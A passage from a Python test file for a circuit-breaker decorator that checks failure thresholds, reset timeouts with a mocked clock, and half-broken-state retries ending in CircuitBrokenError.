contexts.catch(self.function_to_break)
self.mock.return_value = 1.1
def when_we_run_the_function_again(self):
self.exception1 = contexts.catch(self.function_to_break)
self.exception2 = contexts.catch(self.function_to_break)
self.exception3 = contexts.catch(self.function_to_break)
def it_should_have_decremented_the_failure_count(self):
assert isinstance(self.exception1, ValueError)
assert isinstance(self.exception2, ValueError)
assert isinstance(self.exception3, CircuitBrokenError)
def cleanup_the_mock(self):
self.patch.stop()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
raise ValueError
class WhenTheCircuitIsHalfBrokenAndTheFunctionSucceeds:
def given_the_circuit_was_broken_in_the_past(self):
self.x = 0
self.expected_return_value = "some thing that was returned"
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
def when_we_wait_for_the_timeout_and_retry(self):
self.mock.return_value = 1.1
self.result = self.function_to_break()
def it_should_call_the_function(self):
assert self.x == 4
def it_should_forward_the_return_value(self):
assert self.result == self.expected_return_value
def cleanup_the_mock(self):
self.patch.stop()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
self.x += 1
if self.x < 3:
raise ValueError
return self.expected_return_value
class WhenTheCircuitIsHalfBrokenAndTheFunctionFails:
def given_the_circuit_was_broken_in_the_past(self):
self.x = 0
self.expected_exception = ValueError()
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
def when_we_wait_for_the_timeout_and_retry(self):
self.mock.return_value = 1.1
self.exception = contexts.catch(self.function_to_break)
def it_should_call_the_function(self):
assert self.x == 4
def it_should_bubble_out_the_exception(self):
assert self.exception is self.expected_exception
def cleanup_the_mock(self):
self.patch.stop()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
self.x += 1
raise self.expected_exception
class WhenRetryingAfterTheFunctionFailedInTheHalfBrokenState:
def given_the_circuit_was_half_broken_and_the_function_failed_again(self):
self.x = 0
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
self.mock.return_value = 1.1
contexts.catch(self.function_to_break)
def when_we_wait_for_the_timeout_and_retry(self):
self.exception = contexts.catch(self.function_to_break)
def it_should_not_call_the_function(self):
assert self.x == 4
def it_should_throw_CircuitBrokenError(self):
assert isinstance(self.exception, CircuitBrokenError)
def cleanup_the_mock(self):
self.patch.stop()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
self.x += 1
raise ValueError
| benjamin-hodgson/poll | test/circuit_breaker_tests.py | Python | mit | 8,673 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.